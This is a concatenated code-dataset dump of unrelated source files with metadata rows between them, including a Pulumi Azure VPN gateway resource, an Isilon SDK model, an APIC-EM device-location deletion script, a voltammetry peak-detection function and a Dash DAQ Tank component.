temp = self.c[i] - self._v j1 = np.argmin(temp) u1 = temp[j1] temp[j1] = np.max(temp) + 1 j2 = np.argmin(temp) u2 = temp[j2] if u1 < u2: self._v[j1] -= u2 - u1 elif self._y[j1] != -1: j1 = 
j2 k = self._y[j1] if k != -1: self._x[k] = -1 self._x[i] = j1 self._y[j1] = i i = k if np.allclose(u1, u2) or k == -1: break def _update_cred(self): """ Updates the reduced costs with the values from the dual solution """ ui = np.diag(self.c[:, self._x]) - self._v[self._x] self.cred = self.c - ui[:, None] - self._v[None, :] def _augment(self): """ Finds a minimum cost path and adds it to the matching """ #build a minimum cost tree self._build_tree() #update prices delta = self._d[self._ready] - self._mu self._v[self._ready] += delta #augment the solution with the minimum cost path from the #tree. Follows an alternating path along matched, unmatched #edges from X to Y while True: self._i = self._pred[self._j] self._y[self._j] = self._i k = self._j self._j = self._x[self._i] self._x[self._i] = k if self._i == self._istar: break self._update_cred() def _build_tree(self): """ Builds the tree finding an augmenting path. Alternates along matched and unmatched edges between X and Y. The paths are stored in self._pred (new predecessor of nodes in Y), and self._x and self._y """ #find unassigned i* self._istar = np.argmin(self._x) #compute distances self._d = self.c[self._istar] - self._v self._pred = np.zeros(self.n, dtype=np.int) + self._istar #initialize sets #READY: set of nodes visited and in the path (whose price gets #updated in augment) #SCAN: set of nodes at the bottom of the tree, which we need to #look at #T0DO: unvisited nodes self._ready = np.zeros(self.n, dtype=np.bool) self._scan = np.zeros(self.n, dtype=np.bool) self._todo = np.zeros(self.n, dtype=np.bool) + True while True: #populate scan with minimum reduced distances if np.max(self._scan) == 0: self._mu = np.min(self._d[self._todo]) self._scan[np.where(self._d == self._mu)] = 1 self._todo[self._scan] = 0 if np.min(self._y * self._scan) < self.epsilon: self._j = np.argmin(self._y * self._scan) return #pick jstar from scan (scan always has at least 1) self._jstar = np.argmax(self._scan) #pick i associated 
with jstar self._i = self._y[self._jstar] self._scan[self._jstar] = 0 self._ready[self._jstar] = 1 #find shorter distances newdists = self._mu + self.cred[self._i, :] shorter = (newdists < self._d) * self._todo #update distances self._d[shorter] = newdists[shorter] #update predecessors self._pred[shorter] = self._i for self._j in np.argwhere((self._d == self._mu) * self._todo).flatten(): if self._y[self._j] == -1: return self._scan[self._j] = 1 self._todo[self._j] = 0
32.344828
78
0.541844
795a76450f81882f3ef1bec075ff44ad7a0bea41
19,306
py
Python
sdk/python/pulumi_azure_native/network/v20191201/p2s_vpn_gateway.py
sebtelko/pulumi-azure-native
711ec021b5c73da05611c56c8a35adb0ce3244e4
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_native/network/v20191201/p2s_vpn_gateway.py
sebtelko/pulumi-azure-native
711ec021b5c73da05611c56c8a35adb0ce3244e4
[ "Apache-2.0" ]
null
null
null
sdk/python/pulumi_azure_native/network/v20191201/p2s_vpn_gateway.py
sebtelko/pulumi-azure-native
711ec021b5c73da05611c56c8a35adb0ce3244e4
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities from . import outputs from ._inputs import * __all__ = ['P2sVpnGatewayArgs', 'P2sVpnGateway'] @pulumi.input_type class P2sVpnGatewayArgs: def __init__(__self__, *, resource_group_name: pulumi.Input[str], gateway_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, p2_s_connection_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, virtual_hub: Optional[pulumi.Input['SubResourceArgs']] = None, vpn_gateway_scale_unit: Optional[pulumi.Input[int]] = None, vpn_server_configuration: Optional[pulumi.Input['SubResourceArgs']] = None): """ The set of arguments for constructing a P2sVpnGateway resource. :param pulumi.Input[str] resource_group_name: The resource group name of the P2SVpnGateway. :param pulumi.Input[str] gateway_name: The name of the gateway. :param pulumi.Input[str] id: Resource ID. :param pulumi.Input[str] location: Resource location. :param pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]] p2_s_connection_configurations: List of all p2s connection configurations of the gateway. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags. :param pulumi.Input['SubResourceArgs'] virtual_hub: The VirtualHub to which the gateway belongs. :param pulumi.Input[int] vpn_gateway_scale_unit: The scale unit for this p2s vpn gateway. :param pulumi.Input['SubResourceArgs'] vpn_server_configuration: The VpnServerConfiguration to which the p2sVpnGateway is attached to. 
""" pulumi.set(__self__, "resource_group_name", resource_group_name) if gateway_name is not None: pulumi.set(__self__, "gateway_name", gateway_name) if id is not None: pulumi.set(__self__, "id", id) if location is not None: pulumi.set(__self__, "location", location) if p2_s_connection_configurations is not None: pulumi.set(__self__, "p2_s_connection_configurations", p2_s_connection_configurations) if tags is not None: pulumi.set(__self__, "tags", tags) if virtual_hub is not None: pulumi.set(__self__, "virtual_hub", virtual_hub) if vpn_gateway_scale_unit is not None: pulumi.set(__self__, "vpn_gateway_scale_unit", vpn_gateway_scale_unit) if vpn_server_configuration is not None: pulumi.set(__self__, "vpn_server_configuration", vpn_server_configuration) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The resource group name of the P2SVpnGateway. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter(name="gatewayName") def gateway_name(self) -> Optional[pulumi.Input[str]]: """ The name of the gateway. """ return pulumi.get(self, "gateway_name") @gateway_name.setter def gateway_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "gateway_name", value) @property @pulumi.getter def id(self) -> Optional[pulumi.Input[str]]: """ Resource ID. """ return pulumi.get(self, "id") @id.setter def id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "id", value) @property @pulumi.getter def location(self) -> Optional[pulumi.Input[str]]: """ Resource location. 
""" return pulumi.get(self, "location") @location.setter def location(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "location", value) @property @pulumi.getter(name="p2SConnectionConfigurations") def p2_s_connection_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]]]: """ List of all p2s connection configurations of the gateway. """ return pulumi.get(self, "p2_s_connection_configurations") @p2_s_connection_configurations.setter def p2_s_connection_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['P2SConnectionConfigurationArgs']]]]): pulumi.set(self, "p2_s_connection_configurations", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Resource tags. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="virtualHub") def virtual_hub(self) -> Optional[pulumi.Input['SubResourceArgs']]: """ The VirtualHub to which the gateway belongs. """ return pulumi.get(self, "virtual_hub") @virtual_hub.setter def virtual_hub(self, value: Optional[pulumi.Input['SubResourceArgs']]): pulumi.set(self, "virtual_hub", value) @property @pulumi.getter(name="vpnGatewayScaleUnit") def vpn_gateway_scale_unit(self) -> Optional[pulumi.Input[int]]: """ The scale unit for this p2s vpn gateway. """ return pulumi.get(self, "vpn_gateway_scale_unit") @vpn_gateway_scale_unit.setter def vpn_gateway_scale_unit(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "vpn_gateway_scale_unit", value) @property @pulumi.getter(name="vpnServerConfiguration") def vpn_server_configuration(self) -> Optional[pulumi.Input['SubResourceArgs']]: """ The VpnServerConfiguration to which the p2sVpnGateway is attached to. 
""" return pulumi.get(self, "vpn_server_configuration") @vpn_server_configuration.setter def vpn_server_configuration(self, value: Optional[pulumi.Input['SubResourceArgs']]): pulumi.set(self, "vpn_server_configuration", value) class P2sVpnGateway(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, gateway_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, p2_s_connection_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['P2SConnectionConfigurationArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, virtual_hub: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, vpn_gateway_scale_unit: Optional[pulumi.Input[int]] = None, vpn_server_configuration: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, __props__=None): """ P2SVpnGateway Resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] gateway_name: The name of the gateway. :param pulumi.Input[str] id: Resource ID. :param pulumi.Input[str] location: Resource location. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['P2SConnectionConfigurationArgs']]]] p2_s_connection_configurations: List of all p2s connection configurations of the gateway. :param pulumi.Input[str] resource_group_name: The resource group name of the P2SVpnGateway. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags. :param pulumi.Input[pulumi.InputType['SubResourceArgs']] virtual_hub: The VirtualHub to which the gateway belongs. :param pulumi.Input[int] vpn_gateway_scale_unit: The scale unit for this p2s vpn gateway. 
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] vpn_server_configuration: The VpnServerConfiguration to which the p2sVpnGateway is attached to. """ ... @overload def __init__(__self__, resource_name: str, args: P2sVpnGatewayArgs, opts: Optional[pulumi.ResourceOptions] = None): """ P2SVpnGateway Resource. :param str resource_name: The name of the resource. :param P2sVpnGatewayArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(P2sVpnGatewayArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, gateway_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, p2_s_connection_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['P2SConnectionConfigurationArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, virtual_hub: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, vpn_gateway_scale_unit: Optional[pulumi.Input[int]] = None, vpn_server_configuration: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to 
get an existing resource') __props__ = P2sVpnGatewayArgs.__new__(P2sVpnGatewayArgs) __props__.__dict__["gateway_name"] = gateway_name __props__.__dict__["id"] = id __props__.__dict__["location"] = location __props__.__dict__["p2_s_connection_configurations"] = p2_s_connection_configurations if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name __props__.__dict__["tags"] = tags __props__.__dict__["virtual_hub"] = virtual_hub __props__.__dict__["vpn_gateway_scale_unit"] = vpn_gateway_scale_unit __props__.__dict__["vpn_server_configuration"] = vpn_server_configuration __props__.__dict__["etag"] = None __props__.__dict__["name"] = None __props__.__dict__["provisioning_state"] = None __props__.__dict__["type"] = None __props__.__dict__["vpn_client_connection_health"] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20191201:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20180801:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20180801:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20181001:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20181001:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20181101:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20181101:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20181201:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20181201:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190201:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190201:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190401:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190401:P2sVpnGateway"), 
pulumi.Alias(type_="azure-native:network/v20190601:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190601:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190701:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190701:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190801:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190801:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20190901:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190901:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20191101:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20191101:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200301:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200301:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200401:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200401:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200501:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200501:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200601:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200601:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200701:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200701:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20200801:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200801:P2sVpnGateway"), pulumi.Alias(type_="azure-native:network/v20201101:P2sVpnGateway"), pulumi.Alias(type_="azure-nextgen:network/v20201101:P2sVpnGateway")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(P2sVpnGateway, __self__).__init__( 'azure-native:network/v20191201:P2sVpnGateway', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'P2sVpnGateway': """ Get an existing P2sVpnGateway resource's 
state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = P2sVpnGatewayArgs.__new__(P2sVpnGatewayArgs) __props__.__dict__["etag"] = None __props__.__dict__["location"] = None __props__.__dict__["name"] = None __props__.__dict__["p2_s_connection_configurations"] = None __props__.__dict__["provisioning_state"] = None __props__.__dict__["tags"] = None __props__.__dict__["type"] = None __props__.__dict__["virtual_hub"] = None __props__.__dict__["vpn_client_connection_health"] = None __props__.__dict__["vpn_gateway_scale_unit"] = None __props__.__dict__["vpn_server_configuration"] = None return P2sVpnGateway(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def etag(self) -> pulumi.Output[str]: """ A unique read-only string that changes whenever the resource is updated. """ return pulumi.get(self, "etag") @property @pulumi.getter def location(self) -> pulumi.Output[str]: """ Resource location. """ return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Resource name. """ return pulumi.get(self, "name") @property @pulumi.getter(name="p2SConnectionConfigurations") def p2_s_connection_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.P2SConnectionConfigurationResponse']]]: """ List of all p2s connection configurations of the gateway. """ return pulumi.get(self, "p2_s_connection_configurations") @property @pulumi.getter(name="provisioningState") def provisioning_state(self) -> pulumi.Output[str]: """ The provisioning state of the P2S VPN gateway resource. 
""" return pulumi.get(self, "provisioning_state") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Resource tags. """ return pulumi.get(self, "tags") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ Resource type. """ return pulumi.get(self, "type") @property @pulumi.getter(name="virtualHub") def virtual_hub(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]: """ The VirtualHub to which the gateway belongs. """ return pulumi.get(self, "virtual_hub") @property @pulumi.getter(name="vpnClientConnectionHealth") def vpn_client_connection_health(self) -> pulumi.Output['outputs.VpnClientConnectionHealthResponse']: """ All P2S VPN clients' connection health status. """ return pulumi.get(self, "vpn_client_connection_health") @property @pulumi.getter(name="vpnGatewayScaleUnit") def vpn_gateway_scale_unit(self) -> pulumi.Output[Optional[int]]: """ The scale unit for this p2s vpn gateway. """ return pulumi.get(self, "vpn_gateway_scale_unit") @property @pulumi.getter(name="vpnServerConfiguration") def vpn_server_configuration(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]: """ The VpnServerConfiguration to which the p2sVpnGateway is attached to. """ return pulumi.get(self, "vpn_server_configuration")
50.539267
2,705
0.681135
795a78b6e8232cd5b244db41fba7ce92da7f3c05
196
py
Python
runserver.py
dongbum/flask-board
7da191bea47184135ecf235b593e13ecf5793715
[ "MIT" ]
null
null
null
runserver.py
dongbum/flask-board
7da191bea47184135ecf235b593e13ecf5793715
[ "MIT" ]
null
null
null
runserver.py
dongbum/flask-board
7da191bea47184135ecf235b593e13ecf5793715
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from board import create_app application = create_app() if __name__ == '__main__': print("starting test server...") application.run(host='127.0.0.1', port=5000)
19.6
48
0.658163
795a7963768701222eb88ce663883ff1212d34a9
3,029
py
Python
isi_sdk_7_2/isi_sdk_7_2/models/sync_reports.py
mohitjain97/isilon_sdk_python
a371f438f542568edb8cda35e929e6b300b1177c
[ "Unlicense" ]
24
2018-06-22T14:13:23.000Z
2022-03-23T01:21:26.000Z
isi_sdk_7_2/isi_sdk_7_2/models/sync_reports.py
mohitjain97/isilon_sdk_python
a371f438f542568edb8cda35e929e6b300b1177c
[ "Unlicense" ]
46
2018-04-30T13:28:22.000Z
2022-03-21T21:11:07.000Z
isi_sdk_7_2/isi_sdk_7_2/models/sync_reports.py
mohitjain97/isilon_sdk_python
a371f438f542568edb8cda35e929e6b300b1177c
[ "Unlicense" ]
29
2018-06-19T00:14:04.000Z
2022-02-08T17:51:19.000Z
# coding: utf-8 """ Isilon SDK Isilon SDK - Language bindings for the OneFS API # noqa: E501 OpenAPI spec version: 2 Contact: sdk@isilon.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from isi_sdk_7_2.models.sync_report import SyncReport # noqa: F401,E501 class SyncReports(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'reports': 'list[SyncReport]' } attribute_map = { 'reports': 'reports' } def __init__(self, reports=None): # noqa: E501 """SyncReports - a model defined in Swagger""" # noqa: E501 self._reports = None self.discriminator = None if reports is not None: self.reports = reports @property def reports(self): """Gets the reports of this SyncReports. # noqa: E501 :return: The reports of this SyncReports. # noqa: E501 :rtype: list[SyncReport] """ return self._reports @reports.setter def reports(self, reports): """Sets the reports of this SyncReports. :param reports: The reports of this SyncReports. 
# noqa: E501 :type: list[SyncReport] """ self._reports = reports def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, SyncReports): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
26.33913
80
0.560911
795a79ff6e95b959a88968e45a61de536baeffd5
363
py
Python
platform/hwconf_data/zgm13/modules/MODEM/MODEM_behavior.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
null
null
null
platform/hwconf_data/zgm13/modules/MODEM/MODEM_behavior.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T02:36:22.000Z
2020-08-25T02:36:22.000Z
platform/hwconf_data/zgm13/modules/MODEM/MODEM_behavior.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T01:56:04.000Z
2020-08-25T01:56:04.000Z
from . import ExporterModel from . import MODEM_model from . import RuntimeModel class MODEM(ExporterModel.Module): def __init__(self, name=None): if not name: name = self.__class__.__name__ super(MODEM, self).__init__(name, visible=True, core=True) self.model = MODEM_model def set_runtime_hooks(self): pass
25.928571
66
0.674931
795a7a34b8667531a8405374a6d2969b57c5cda3
2,600
py
Python
lab6-04-delete-network-device-id-location.py
ralfraij/apicem-ll-sample-code
adb0988af7b506610b218db7136ec58354572f4b
[ "Apache-2.0" ]
1
2018-06-28T00:11:16.000Z
2018-06-28T00:11:16.000Z
lab6-04-delete-network-device-id-location.py
ralfraij/apicem-ll-sample-code
adb0988af7b506610b218db7136ec58354572f4b
[ "Apache-2.0" ]
null
null
null
lab6-04-delete-network-device-id-location.py
ralfraij/apicem-ll-sample-code
adb0988af7b506610b218db7136ec58354572f4b
[ "Apache-2.0" ]
null
null
null
import requests # We use Python "requests" module to do HTTP GET query import json # Import JSON encoder and decode module import sys from operator import itemgetter from apicem_config import * # APIC-EM IP is assigned in apicem_config.py requests.packages.urllib3.disable_warnings() # Remove this line if not using Python 3 # ***************************************** # IP of the network device that we want to remove the location # You need to assigned ip here to_delete = "10.10.40.66" # ***************************************** if to_delete == "": print ("Have you assigned a application name to be deleted ?") sys.exit(1) device_list = [] # create device id list url = "https://"+apicem_ip+"/api/v0/network-device/count" # API base url resp= requests.get(url,verify=False) # The response (result) from "GET /network-device/count" query response_json = resp.json() # Get the json-encoded content from response with "response_json = resp.json() count = response_json["response"] # Total count of network-device and convert it to string if count > 0 : device_list = [] url = "https://"+apicem_ip+"/api/v0/network-device/1/"+str(count) # API base url, convert 'count' to string resp= requests.get(url,verify=False) # The response (result) from "GET /network-device/{startIndex}/{recordsToReturn}" query response_json = resp.json() # Get the json-encoded content from response for item in response_json["response"]: if "locationName" in item: pass else: item["locationName"] = '' device_list.append([item["hostname"],item["type"],item["managementIpAddress"],item["id"],item["locationName"]]) device_list.sort() else: print ("No network device found !") sys.exit(1) # Check if selected network device has been assigned a location. 
Proceed if yes, do nothing if no # item[2] id the IP,item[3] is the network device id and item[4] is the locationName for item in device_list: if item[2] == to_delete: if item[4] != '': id = item[3] print ("Location %s will be deleted from this network device" % (item[4])) url = "https://"+apicem_ip+"/api/v0/network-device/"+id+"/location" resp= requests.delete(url,verify=False) print ("Status:",resp.status_code) print (resp.text) else: print ("No location is assigned to this network device, nothing to delete !") sys.exit(1) print ("Cannot find network device with this IP: ",to_delete)
44.067797
128
0.636538
795a7a9cbf7ba6dcb3fcbd2b582abb24de74f26d
2,090
py
Python
voltcycle/peak_detection_fxn.py
MariaPoliti/voltcycle
cc67ae91103ac6bdc0c7995834865d8bcb176ec3
[ "MIT" ]
null
null
null
voltcycle/peak_detection_fxn.py
MariaPoliti/voltcycle
cc67ae91103ac6bdc0c7995834865d8bcb176ec3
[ "MIT" ]
null
null
null
voltcycle/peak_detection_fxn.py
MariaPoliti/voltcycle
cc67ae91103ac6bdc0c7995834865d8bcb176ec3
[ "MIT" ]
null
null
null
"""This module contains a function to determine the peaks in the specified dataset, based on the y values (or current values). The function takes in the specified y column of the dataframe and outputs a list consisting of the index values of the peaks. This module calls the peakutils and numpy packages along with the'main.py' file in the master branch.""" import peakutils # import numpy as np # from . import core def peak_detection(data_y, scan_sign): """The function takes an input of the column containing the y variables in the dataframe, associated with the current. The function calls the split function, which splits the column into two arrays, one of the positive and one of the negative values. This is because cyclic voltammetry delivers negative peaks,but the peakutils function works better with positive peaks. The function also runs on the middle 80% of data to eliminate unnecessary noise and messy values associated with pseudo-peaks.The vectors are then imported into the peakutils. Indexes function to determine the significant peak for each array. The values are stored in a list, with the first index corresponding to the top peak and the second corresponding to the bottom peak. Parameters ---------- y column: pd.DataFrame/Series must be a column from a pandas dataframe scan_sign: str Can be 'positive' or 'negative' Return ------- peak_index: list A list with the index of the peaks from the top curve and bottom curve. """ peak_index = {} if scan_sign == 'positive': try: peak_index['peak_top'] = peakutils.indexes( data_y, thres=0.99, min_dist=50)[0] except IndexError: peak_index['peak_top'] = 0 # print(peak_index) else: try: peak_index['peak_bottom'] = peakutils.indexes( -data_y, thres=0.99, min_dist=50)[0] except IndexError: peak_index['peak_bottom'] = 0 return peak_index
39.433962
79
0.675598
795a7b483ea41a82238961f88dce62c117083703
4,169
py
Python
dash_daq/Tank.py
yordiverbeeck/dash-daq
7450d92f7c60d42a42f62dbaa0e5053f4432a3a1
[ "MIT" ]
null
null
null
dash_daq/Tank.py
yordiverbeeck/dash-daq
7450d92f7c60d42a42f62dbaa0e5053f4432a3a1
[ "MIT" ]
null
null
null
dash_daq/Tank.py
yordiverbeeck/dash-daq
7450d92f7c60d42a42f62dbaa0e5053f4432a3a1
[ "MIT" ]
null
null
null
# AUTO GENERATED FILE - DO NOT EDIT from dash.development.base_component import Component, _explicitize_args class Tank(Component): """A Tank component. A Tank component that fills to a value between some range. Keyword arguments: - id (string; optional): The ID used to identify this component in Dash callbacks. - base (number; default 10): Base to be used in logarithmic scale. - className (string; optional): Class to apply to the root component element. - color (string; optional): The color of tank fill. - height (number; default 192): The height of the tank in pixels. - label (dict; optional): Description to be displayed alongside the control. To control styling, pass an object with label and style properties. `label` is a string | dict with keys: - label (string; optional) - style (dict; optional) - labelPosition (a value equal to: 'top', 'bottom'; default 'top'): Where the component label is positioned. - logarithmic (boolean; optional): If set to True, a logarithmic scale will be used. - max (number; default 10): The maximum value of the tank. If logarithmic, represents the maximum exponent. - min (number; default 0): The minimum value of the tank. If logarithmic, represents minimum exponent. - scale (dict; optional): Configuration for the component scale. `scale` is a dict with keys: - custom (dict; optional): Custom scale marks. The key determines the position and the value determines what will show. If you want to set the style of a specific mark point, the value should be an object which contains style and label properties. `custom` is a number Or dict with keys: - label (string; optional) - style (string; optional) - interval (number; optional): Interval by which the scale goes up. Attempts to dynamically divide min-max range by default. - labelInterval (number; optional): Interval by which labels are added to scale marks. Defaults to 2 (every other mark has a label). - start (number; optional): Value to start the scale from. Defaults to min. 
- showCurrentValue (boolean; optional): If True, the current value of the tank will be displayed. - style (dict; optional): Style to apply to the root component element. - units (string; optional): Label for the current value. - value (number; optional): The value of tank. If logarithmic, the displayed value will be the logarithm of the inputted value. - width (number; default 112): The width of the tank in pixels.""" @_explicitize_args def __init__(self, id=Component.UNDEFINED, value=Component.UNDEFINED, height=Component.UNDEFINED, width=Component.UNDEFINED, color=Component.UNDEFINED, min=Component.UNDEFINED, max=Component.UNDEFINED, base=Component.UNDEFINED, logarithmic=Component.UNDEFINED, showCurrentValue=Component.UNDEFINED, units=Component.UNDEFINED, label=Component.UNDEFINED, labelPosition=Component.UNDEFINED, scale=Component.UNDEFINED, className=Component.UNDEFINED, style=Component.UNDEFINED, **kwargs): self._prop_names = ['id', 'base', 'className', 'color', 'height', 'label', 'labelPosition', 'logarithmic', 'max', 'min', 'scale', 'showCurrentValue', 'style', 'units', 'value', 'width'] self._type = 'Tank' self._namespace = 'dash_daq' self._valid_wildcard_attributes = [] self.available_properties = ['id', 'base', 'className', 'color', 'height', 'label', 'labelPosition', 'logarithmic', 'max', 'min', 'scale', 'showCurrentValue', 'style', 'units', 'value', 'width'] self.available_wildcard_properties = [] _explicit_args = kwargs.pop('_explicit_args') _locals = locals() _locals.update(kwargs) # For wildcard attrs args = {k: _locals[k] for k in _explicit_args if k != 'children'} for k in []: if k not in args: raise TypeError( 'Required argument `' + k + '` was not specified.') super(Tank, self).__init__(**args)
36.570175
487
0.675941
795a7bcb251377e29027af7e55401dd7e5d4408a
1,582
py
Python
scripts/sent_enc_nli/train_nli.py
lukecq1231/sent_enc_nli_sick
e71e6f245591214168ee8ff1588d1e8b866d7e2c
[ "BSD-3-Clause" ]
3
2017-10-11T21:00:55.000Z
2019-02-12T16:41:00.000Z
scripts/sent_enc_nli/train_nli.py
lukecq1231/sent_enc_nli_sick
e71e6f245591214168ee8ff1588d1e8b866d7e2c
[ "BSD-3-Clause" ]
null
null
null
scripts/sent_enc_nli/train_nli.py
